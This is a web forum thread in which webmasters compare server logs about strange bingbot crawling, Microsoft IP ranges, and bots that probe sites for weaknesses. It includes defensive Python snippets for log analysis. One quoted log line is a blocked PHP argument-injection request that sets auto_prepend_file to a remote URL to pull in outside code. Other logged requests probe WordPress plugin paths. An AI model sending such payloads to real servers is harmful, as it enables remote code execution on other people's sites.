bingbot? are you feeling all right?

     
12:30 am on Oct 28, 2015 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:Apr 9, 2011
posts:13537
votes: 403


Anyone else happen to notice this?

Background #1 I've got assorted ancient URLs that involve filenames in CamelCase. Some still exist, some have long since been redirected to completely different names, some are simply gone (410).
Background #2 About two years back, I moved sites and have since paid close attention to search engines' redirected requests.

For a short period-- less than 24 hours total-- all bingbot requests to my old site were strictly lower-case, regardless of the URL's correct casing. So any request for a page would have ended up with its directory's generic redirect, like

example.old/directory/lowercasename.html >> example.new/directory/lowercasename.html (URL which has never existed)

Just one site. And it stopped as suddenly as it started. So far :: fingers crossed :: I haven't seen any requests on the new site for these wholly nonexistent lower-case filenames.
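
For anyone who wants to check their own logs for the same pattern, here is a minimal sketch that flags requests differing from a real path only by letter case. The function name and sample paths are hypothetical, and it assumes you already have a list of requested paths and a list of paths that actually exist.

```python
def find_case_mismatches(requested_paths, known_paths):
    """Return (requested, canonical) pairs that differ only by letter case."""
    # Map the lower-cased form of each real path to its canonical spelling.
    canonical_by_lower = {path.lower(): path for path in known_paths}
    mismatches = []
    for requested in requested_paths:
        canonical = canonical_by_lower.get(requested.lower())
        # A match with a different spelling means only the casing is wrong.
        if canonical is not None and canonical != requested:
            mismatches.append((requested, canonical))
    return mismatches


# Hypothetical paths, for illustration only.
known = ["/directory/CamelCase.html", "/directory/index.html"]
requested = ["/directory/camelcase.html", "/directory/index.html", "/nowhere.html"]
print(find_case_mismatches(requested, known))
```

Note that two real paths differing only by case would collide in the lookup table; the sketch assumes that does not happen on your site.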

Weird.
2:08 pm on Nov 3, 2015 (gmt 0)

Senior Member

WebmasterWorld Senior Member Top Contributors Of The Month

joined:Aug 1, 2013
posts:1338
votes: 22


Bing seems to be asleep at the moment (or perhaps the last six months at least). They're not even processing my sitemaps. I still have http / https duplicates showing up in the listings. Frustrating!
12:41 pm on Dec 11, 2015 (gmt 0)

Moderator from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:7746
votes: 262


Nonexistent file names & directories are indigenous to Bing. I've complained about it for years.
10:24 pm on Dec 20, 2015 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:Apr 9, 2011
posts:13537
votes: 403


Nonexistent file names & directories are indigenous to Bing.

How 'bout this one? Alongside a further one-off "lowercase.html" for correct "CamelCase.html"* there's ....
40.77.167.92 - - [17/Dec/2015:23:45:25 -0800] "GET /CookiePingback HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 
207.46.13.21 - - [18/Dec/2015:02:20:52 -0800] "GET /classic/headerinfo.ashx?site=undefined&lang=undefined&cur=JPY HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.74 - - [18/Dec/2015:08:12:01 -0800] "GET /ebooks/perez/css/custom-bg.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.74 - - [18/Dec/2015:08:12:03 -0800] "GET /ebooks/perez/css/mediaelementplayer.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.74 - - [18/Dec/2015:08:12:06 -0800] "GET /ebooks/perez/css/settings.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.74 - - [18/Dec/2015:08:12:09 -0800] "GET /ebooks/perez/css/shortcodes.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.74 - - [18/Dec/2015:08:12:12 -0800] "GET /inc/vbulletin_autosave.js HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.92 - - [18/Dec/2015:08:14:20 -0800] "GET /ebooks/perez/css/font-awesome.min.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.92 - - [18/Dec/2015:08:14:24 -0800] "GET /ebooks/perez/css/main.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.92 - - [18/Dec/2015:08:14:26 -0800] "GET /ebooks/perez/css/owl.carousel.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.92 - - [18/Dec/2015:08:14:29 -0800] "GET /ebooks/perez/css/video-js.min.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.92 - - [18/Dec/2015:08:14:32 -0800] "GET /ebooks/perez/js/vendor/modernizr-2.6.2.min.js HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.21 - - [18/Dec/2015:08:18:05 -0800] "GET /ebooks/perez/css/animate.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.21 - - [18/Dec/2015:08:18:07 -0800] "GET /ebooks/perez/css/reset.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.130 - - [18/Dec/2015:08:48:11 -0800] "GET /ebooks/perez/css/bootstrap.min.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.130 - - [18/Dec/2015:08:48:12 -0800] "GET /ebooks/perez/css/bootstrap1740.min.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.130 - - [18/Dec/2015:08:48:12 -0800] "GET /ebooks/perez/css/jquery.fs.shifter.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.120 - - [18/Dec/2015:08:48:20 -0800] "GET /ebooks/perez/css/knight-iconfont.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.120 - - [18/Dec/2015:08:48:21 -0800] "GET /ebooks/perez/css/magnific-popup.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
Er, wtf? /ebooks/perez/ is a real directory; /inc/ is not. Nor have I ever, anywhere, had a directory called /css/ or /js/. In fact the idea makes my skin crawl, because who needs so many stylesheets that they need to be collected in their own directory?

Some of those imaginary filenames make me wonder if it's got something to do with bing's ventures into responsiveness-land.


* The irony is that I just recently redirected half-a-dozen of those CamelCase URLs as they were giving me the fantods. Not to lowercase, which would have been pointless, but to a different name entirely.
11:43 pm on Dec 20, 2015 (gmt 0)

Moderator from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:7746
votes: 262


I've been trying to figure out Bing's requests for a while. I gave up.
6:43 am on Dec 21, 2015 (gmt 0)

Moderator from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:7746
votes: 262


I think that trying to find a logical explanation for these Bing request anomalies only leads to frustration.

I once thought the source may have been a corrupted link directory Bing was using for discovery. My next guess was that my own file server was the cause, but if so why didn't other bots duplicate the errors?

Googlebot does occasionally look for similar badly formed links on my servers but nowhere close to that of Bing.

It remains a mystery... along with my missing socks.
3:05 am on Dec 22, 2015 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member tangor is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Nov 29, 2005
posts:7208
votes: 453


No Worries, Be Happy. Why? No real traffic involved, just a log entry that ticks the anal retentive off. Bing does continue to serve better results than G... and that's what I take to the bank (as I am not reliant on G for income, but I am reliant on good traffic).
4:30 am on Dec 22, 2015 (gmt 0)

Moderator from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:7746
votes: 262


"...a log entry that ticks the anal retentive off"

Have you tried prunes?
4:27 am on Jan 2, 2016 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Mar 17, 2006
posts: 838
votes: 0


Well, I too got Bing crawling URIs that look like it's doing penetration testing. Non-existent scripts, js, css files, some with clearly unique session IDs in them etc. It looks horrible, and it sounds like it's not benign either. Sites with these crap URIs being visited are dropping from Bing's index like flies. I have a few already that lost 99% of the previously indexed URLs. Similarly affected is the traffic, too.

So, responding to tangor - there's a reason to worry. Traffic is involved. 90% down is pretty darn dramatic, and looks like it's due to some error or perhaps an attack that exploits some sort of a weakness in Bing. I filed a message with Bing Help about this - not sure if they will ever respond. I've never really gotten a reply from them before.
4:42 am on Jan 2, 2016 (gmt 0)

Moderator from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:7746
votes: 262


I exchanged emails with Bing support for several weeks a year ago. First they denied it. Then after I sent numerous log examples to them they acknowledged the issue and said a fix was in place and I should wait till the next crawl index to see the correction.

That never happened.
4:05 am on Jan 29, 2016 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month

joined:Dec 27, 2004
posts:1888
votes: 56


and now a new LACNIC Range...

ip: 191.232.136.94
remote host: msnbot-191-232-136-94.search.msn.com

inetnum: 191.232/14
aut-num: AS8075
abuse-c: BEORN2
owner: Microsoft Informatica Ltda
7:32 am on Jan 29, 2016 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:Apr 9, 2011
posts:13537
votes: 403


Crikey, is that a real msn range? I know I've got it labeled from a while back, but re-checking logs I don't find anything but malign and/or garbage requests with assorted highly dubious UAs.
191.232.39.241 - - [24/Jan/2016:22:19:43 -0800] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://www.example.com.br/img/r.txt HTTP/1.1" 403 3469 "-" "LWP::Simple/6.00 libwww-perl/6.05"
Turns out that was just a few days ago; I didn't notice it because of the out-of-sight out-of-mind 403 response. (%3D is the = sign. Had to go look that up. I assume the UA is what got them blocked.)
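
If looking up escapes by hand gets tedious, the standard library can decode them. A small sketch using the query string from the log line above; `unquote` turns `%20` into a space and `%3D` into `=`, and leaves the literal `+` alone. Decoded, it reads like a pair of PHP-style `-d` settings, though that interpretation is a guess from the text itself.

```python
from urllib.parse import unquote

# Query string copied from the 403'd request in the log line above.
raw_query = (
    "-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D"
    "http://www.example.com.br/img/r.txt"
)

# Percent-escapes are decoded; "+" is left untouched by unquote().
decoded = unquote(raw_query)
print(decoded)
```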
9:05 am on Jan 29, 2016 (gmt 0)

Moderator from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:7746
votes: 262


191.232.136.24 - - [29/Jan/2016:00:43:58 -0800] "GET /page.html HTTP/1.1" 200 2984 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

The problem is that while this is a valid crawl range: msnbot-191-232-136-24.search.msn.com... Other sub-ranges of the /14 show as Microsoft's Azure Cloud in Brazil & can be leased by anyone (think AWS.) This is why there are so many spam & hack reports at webhoneypot, spamhaus & other reporting agencies.
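
One way to separate the real crawler from leased cloud hosts in the same block is a forward-confirmed reverse DNS check: look up the PTR name, require the `.search.msn.com` suffix seen above, then confirm the name resolves back to the same IP. A rough sketch, not a hardened implementation; the function name, the injectable lookup parameters, and the stub data are all hypothetical, and the suffix rule is an assumption based on the hostnames in this thread.

```python
import socket


def is_verified_bingbot(ip, reverse_lookup=None, forward_lookup=None):
    """Forward-confirmed reverse DNS check for a claimed bingbot address."""
    # Default to real DNS lookups; callers can pass stand-ins for testing.
    reverse_lookup = reverse_lookup or (lambda addr: socket.gethostbyaddr(addr)[0])
    forward_lookup = forward_lookup or (lambda host: socket.gethostbyname_ex(host)[2])
    try:
        hostname = reverse_lookup(ip)
    except OSError:
        return False
    # Assumption: genuine crawler hosts end in .search.msn.com.
    if not hostname.lower().endswith(".search.msn.com"):
        return False
    try:
        # The name must resolve back to the address we started from.
        return ip in forward_lookup(hostname)
    except OSError:
        return False


# Stub lookups so the example runs without touching the network.
fake_ptr = {"191.232.136.24": "msnbot-191-232-136-24.search.msn.com"}
fake_a = {"msnbot-191-232-136-24.search.msn.com": ["191.232.136.24"]}
print(is_verified_bingbot("191.232.136.24", fake_ptr.__getitem__, fake_a.__getitem__))
```

Called with just an IP, it falls back to live DNS via the `socket` module.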

So maybe a more surgical approach w/ a few conditions is needed for:
191.232.0.0 - 191.235.255.255
191.232.0.0/14

BTW, this MS block is actually much larger including other MS assignments:
191.232.0.0 - 191.239.255.255
191.232.0.0/13
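
The start and end of a CIDR block can be double-checked with Python's standard `ipaddress` module. A quick sketch that prints the first and last address of the /14 and the /13 and tests whether the crawler IP from the log line falls inside the /14:

```python
import ipaddress

# Print the first and last address of each block.
for cidr in ("191.232.0.0/14", "191.232.0.0/13"):
    net = ipaddress.ip_network(cidr)
    print(cidr, "=", net[0], "-", net[-1])

# Membership test for the bingbot address seen in the log.
crawler_ip = ipaddress.ip_address("191.232.136.24")
print(crawler_ip in ipaddress.ip_network("191.232.0.0/14"))
```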
10:29 am on Jan 29, 2016 (gmt 0)

Moderator from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:7746
votes: 262


I didn't notice it because of the out-of-sight out-of-mind 403 response
Funny, that's the one thing I *always* examine in my server logs. I pull all the 403s and see who/why they got blocked. This really pays off & IMO is essential if (like me) you block server ranges... they are always being re-purposed & re-allocated. A huge percentage of server farms now have mobile allocations & cloud servers leased to mobile apps, which translates into human traffic.
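
For anyone who wants to try the same habit, pulling the 403s out of a combined-format access log takes only a few lines. A minimal sketch, assuming the log layout shown in this thread; the regex and function name are my own, and the two sample lines are copied from earlier posts.

```python
import re
from collections import Counter

# Assumed layout: Apache combined log format, as in the lines quoted above.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)


def blocked_requests(lines):
    """Yield parsed entries whose status code is 403."""
    for line in lines:
        match = LOG_LINE.match(line)
        if match and match.group("status") == "403":
            yield match.groupdict()


sample = [
    '191.232.39.241 - - [24/Jan/2016:22:19:43 -0800] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://www.example.com.br/img/r.txt HTTP/1.1" 403 3469 "-" "LWP::Simple/6.00 libwww-perl/6.05"',
    '191.232.136.24 - - [29/Jan/2016:00:43:58 -0800] "GET /page.html HTTP/1.1" 200 2984 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"',
]

# Tally blocked requests by user agent to see who is being turned away.
by_agent = Counter(entry["agent"] for entry in blocked_requests(sample))
print(by_agent)
```

Grouping by IP or by request path instead is a one-word change in the `Counter` line.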
1:47 pm on Jan 29, 2016 (gmt 0)

Administrator from US 

WebmasterWorld Administrator not2easy is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Dec 27, 2006
posts:3107
votes: 120


104.40.0.0 - 104.47.255.255
104.40.0.0/13
Is another msft range full of malicious visitors - NOT pretending to be bingbot, but switching UAs on the fly:
104.45.146.213 - - [23/Jan/2016:12:01:24 -0600] "GET /wp-content/plugins/custom-content-type-manager/index.html HTTP/1.1" 404 3383 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11"
104.45.146.213 - - [23/Jan/2016:12:01:24 -0600] "GET /wp-content/plugins/fcchat/default.png HTTP/1.1" 404 3383 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.34 Safari/534.24"
104.45.146.213 - - [23/Jan/2016:12:01:24 -0600] "GET /wp-content/plugins/magic-fields/MF_Constant.php HTTP/1.1" 404 3384 "-" "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1"
104.45.146.213 - - [23/Jan/2016:12:01:24 -0600] "GET /wp-content/plugins/nextgen-gallery/changelog.txt HTTP/1.1" 404 3383 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.11 (KHTML, like Gecko) Ubuntu/11.04 Chromium/17.0.963.56 Chrome/17.0.963.56 Safari/535.11"
My logs show 15 hits per second from that range, in a long run of requests probing for vulnerabilities.
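
A client that changes user agent within the same second is easy to spot mechanically. A rough sketch, assuming combined-format log lines like the ones above; the function names and the threshold of two agents per second are arbitrary choices for illustration.

```python
import re
from collections import defaultdict

# Captures IP, timestamp and user agent from a combined-format log line.
ENTRY = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "[^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')


def agents_per_second(lines):
    """Map (ip, timestamp) to the set of user agents seen in that second."""
    seen = defaultdict(set)
    for line in lines:
        match = ENTRY.match(line)
        if match:
            ip, timestamp, agent = match.groups()
            seen[(ip, timestamp)].add(agent)
    return seen


def rotating_clients(lines, threshold=2):
    """Return IPs that used at least `threshold` agents within one second."""
    return sorted(
        {ip for (ip, _), agents in agents_per_second(lines).items()
         if len(agents) >= threshold}
    )


sample = [
    '104.45.146.213 - - [23/Jan/2016:12:01:24 -0600] "GET /wp-content/plugins/custom-content-type-manager/index.html HTTP/1.1" 404 3383 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11"',
    '104.45.146.213 - - [23/Jan/2016:12:01:24 -0600] "GET /wp-content/plugins/fcchat/default.png HTTP/1.1" 404 3383 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.34 Safari/534.24"',
]
print(rotating_clients(sample))
```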
9:53 pm on Jan 29, 2016 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:Apr 9, 2011
posts:13537
votes: 403


I pull all the 403s and see who/why they got blocked.

I only check for blocked humans, manifested by requests for errorstyles.css on originating site, and/or piwik request for forbidden.html. (I included piwik code on the 403 page for this very reason.)
12:24 am on Jan 30, 2016 (gmt 0)

Moderator from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:7746
votes: 262


...switching UAs on the fly
That's just a script setting. AFAIK several GET scripts do that. There's a popular, free PHP script that has that option.
12:40 am on Jan 30, 2016 (gmt 0)

Moderator from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:7746
votes: 262


As far as piwik goes... I don't use any traffic stat type of software that requires their code in my markup. If it serves your needs, great but I've tried several and they never gave me enough aggregated info to justify the extra code in my pages. And the ones that require a remote HTTP connection like Google Analytics were the worst!

I just download my raw access logs to my local machine, then open it through a customized version of Analog to produce an informative zeitgeist. I really like Analog and have used it for years.
3:48 am on Jan 30, 2016 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:Apr 9, 2011
posts:13537
votes: 403


<topic drift>
they never gave me enough aggregated info to justify the extra code in my pages

Funny you should say that, because I can go for months on end without even looking at the piwik page. And it is a huge script, something like 25k. In fact the main thing I do with it is tracking the mere act of requesting /piwik.php, because this is a pretty solid indicator of, er, humanity. Of course the great advantage of piwik-or-similar vs. GA-or-similar is that, because it lives on your own server, it's subject to your own access controls. So the GA problem of reported visits from people who were never allowed to set foot on your site-- assuming they even tried-- doesn't occur.

When I do check analytics, the one thing I especially like to look at is Outbound Links. I like to see where people went, and where they went there from. (ymmv, but I love the thought that when people leave my site-- as inevitably they must-- they're going someplace where I sent them.)

Then again, I've got such teeny little sites, I can wrangle my raw logs in javascript. That's tiny ;)
</td>
4:35 pm on Jan 31, 2016 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month

joined:Dec 27, 2004
posts:1888
votes: 56


I have been getting requests for all lower case URIs from 157.55.39.NNN and 40.77.167.NNN IPs for the past several days. Yesterday I changed the code to send a 400 Bad Request response and after about 40 hits they stopped for about an hour. Then the bots decided to crawl the non-www version of properly cased URLs. So I changed the code to send 400 to those too.

Haven't seen any monkish requests since. What Gives?
3:56 am on Feb 3, 2016 (gmt 0)

Moderator from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:7746
votes: 262


<serious topic drift>
And it is a huge script, something like 25k
With mobile search, if pages are large, Google will attempt to serve a transcoded or weblight version of your page in regions where connection speed is below a certain marker. Some browsers (desktop & mobile) also do this, as do some SEs in other countries (especially China, India & Indonesia.)

I said "attempt" because even if we use the "no-transform" header tag or block transcoder or weblight entirely, Google will *still* put their stupid lean version of our pages in their mobile SERP; it's just that in many cases the visitor gets whatever alternative result we create (403, 404, etc...) by not allowing it.
</std>
(sorry to give you an std)
6:57 pm on Feb 3, 2016 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:Apr 9, 2011
posts:13537
votes: 403


:: snrk ::
6:23 pm on Feb 9, 2016 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month

joined:Dec 27, 2004
posts:1888
votes: 56


So just for kickers I created a Bing Webmaster Tools account to see what is going on with this one site.

Interesting Drill down architecture. All CamelCase URIs are lowercased in the reports. That freaked me out though, at first, but then again who does not make mistakes in.... right?
I thought maybe it was in the CSS? Nope: view source on their site (Bing Webmaster Tools >> Index Explorer) shows lower case. In reality the lower-cased URI has been redirected to CamelCase since 2004. I picked this particular URI because it was tried in lower case 41 times when the fiasco started.
 
